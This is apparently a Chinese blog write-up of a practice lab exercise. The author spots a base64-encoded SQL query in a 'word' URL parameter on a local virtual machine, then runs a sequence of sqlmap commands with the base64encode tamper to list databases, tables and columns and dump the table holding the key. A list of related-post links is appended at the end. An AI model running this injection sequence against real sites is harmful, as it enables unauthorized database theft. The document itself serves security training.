第二个虚拟机打开是这样的,

点击order by ranking,发现有一个word参数,参数后面的我们很容易可以看出是base64加密,

这里解密来一波,

很明显是sql查询语句,于是博主直接扔sqlmap跑去了,

检测到word参数有注入点,但是传入的参数都是base64处理过的,于是我们直接导入sqlmap中那个的tamper,base64encode这个模块

检测数据库

1 python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode   --level 5

View Code

跑出来四个数据库

有一个数据库与其他数据库格格不入,很明显second就是我们的目标了

下一步,检测数据表

1  python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode   --level 5 -D second --tables

View Code

跑出来一个language表

下一步,检测表下面的列名,有三个列名

1  python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode   --level 5 -D second -T language --columns

View Code

下一步,根据列名dump出有效信息

1  python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode   --level 5 -D second -T language -C year,language,ranking --dump

View Code

ok,成功拿到Key

转载于:https://www.cnblogs.com/mke2fs/p/10651012.html

黑阔主流攻防之加密与解密的对抗二相关推荐

  1. 黑阔主流攻防之不合理的cookie验证方式

    最近博主没事干中(ZIZUOZISHOU),于是拿起某校的习题研究一番,名字很6,叫做黑阔主流攻防习题 虚拟机环境经过一番折腾,配置好后,打开目标地址:192.168.5.155 如图所示 这里看出题 ...

  2. PDF加密、解密内幕(二) - PDF文件口令加密内幕

    PDF加密.解密内幕(二) - PDF文件口令加密内幕 0 几个重要概念 全局加密密钥,简称为全局密钥,该全局密钥由加密字典对象和你输入的口令生成,用来生成对象加密密钥. 对象加密密钥,简称为对象密钥 ...

  3. PDF加密、解密内幕(二)- PDF文件口令加密内幕

    0 几个重要概念 全局加密密钥,简称为全局密钥,该全局密钥由加密字典对象和你输入的口令生成,用来生成对象加密密钥. 对象加密密钥,简称为对象密钥,是用来实际加密PDF文件内容的密钥,不同于上篇PDF加 ...

  4. 二维 Arnold 的图像置乱加密及解密——Matlab实现

    二维 Arnold 的图像置乱加密及解密--Matlab实现 二维 Arnold 的图像置乱加密及解密(1):RGB图像的处理 基于Arnol变换的图像置乱 Arnold变换是俄国数学家Vladimi ...

  5. 北风网--网络安全系列课程之网络攻防全面实战(涉及加密、解密)

    讲师简单介绍:讲师龙飞为北风网网络安全领域讲师,讲师曾经先后在国内各大网站,如黑鹰.甲壳虫之类的黑客网站从事网络安全教育!本系列课程由龙飞讲师主讲,共60课时,全面讲述网络安全方面各大知识,是一个不错 ...

  6. 加密与解密、OpenSSL(SSL/TLS)、OpenSSH(ssh)、dropbear

    下面介绍的是Linux的加密与解密.OpenSSL(SSL/TLS).OpenSSH(ssh).dropbear. 一.数据的加密与解密 1.进程间通信基础 (1).进程间通信方式 同一主机间进程间的 ...

  7. 对称加密----AES和DES加密、解密

    目前主流的加密方式有:(对称加密)AES.DES        (非对称加密)RSA.DSA 调用AES/DES加密算法包最精要的就是下面两句话: Cipher cipher = Cipher.get ...

  8. 常见的加密和解密算法—MD5

    转载:https://www.cnblogs.com/maohuidong/p/7967257.html 常见的加密和解密算法-MD5 一.MD5加密概述 Message Digest Algorit ...

  9. 超千人围观,普及 “反诈” 常见场景及应对手段,还有黑灰产攻防手段

    10 月 26 日,由软件绿色联盟举办的 "反诈" 主题直播活动已圆满落幕.本次直播我们特邀了两位 360 的资深技术专家,对<电信网络诈骗趋势解读与应对>.<黑 ...

最新文章

  1. STM32 逐次逼近寄存器型(SAR)模拟数字转换器(ADC)
  2. http协议报文体_HTTP协议扫盲(七)请求报文之 GET、POST-FORM 和 POST-FILE
  3. [有限元] Ansys Workbench 19.2 平面应力问题分析示例
  4. 教程:VS2010 之TFS入门指南
  5. ShowAPI识别验证码
  6. AMOS分析技术:路径分析的非递归模型
  7. android怎么实现记住密码功能,Android App“记住密码”功能的实现逻辑
  8. 百度网盘链接怎么同步更新、百度网盘链接同步、百度网盘分享同步更新、百度网盘怎么同步更新、百度网盘资源同步更新、百度网盘分享文件同步更新、百度网盘好友分享同步更新、百度网盘共享文件同步更新...
  9. 如何找到QQ互联开发者认证在哪?
  10. Jenkins基础入门-9-构建触发器之项目之间依赖关系
  11. android studio连接本地SqlServer数据库报网络错误
  12. 上手Fragment
  13. linux 执行计划任务
  14. Studio One v4.6.2 x64 WiN 音乐制作编曲宿主软件下载
  15. 能够证明“3=0”吗?
  16. Spring Cloud(十一):Hystrix服务熔断-工作流程
  17. 一级计算机的分类汇总在哪里,在Excel工作表的数据列表中插入分类汇总
  18. python猜单词游戏_Python小程序之猜单词游戏
  19. android跌倒检测,基于Android手机的老人跌倒检测方法的研究与设计
  20. Windows Phone灵魂诠释:Metro UI界面完全解析

热门文章

  1. 【数据预处理】CoCo数据集标注文件.json转yolov5标注文件.txt格式
  2. 设计模式-抽象工厂模式实例(二)
  3. EKS集群手动升级kube-proxy组件
  4. Vue中修改element-ui中的el-table中默认的暂无数据样式
  5. POS收银机收款机使用介绍
  6. Win11应用商店下载的软件怎么移到桌面
  7. Lab01: Logisim简单数字电路模拟实验
  8. 有效需求分析培训梳理(一)
  9. 自动化测试简历编写应该注意哪方面?有哪些技巧?
  10. BAT高级架构师合力熬夜15天,肝出了这份PDF版《Android百大框架源码解析》,还不快快码住。。。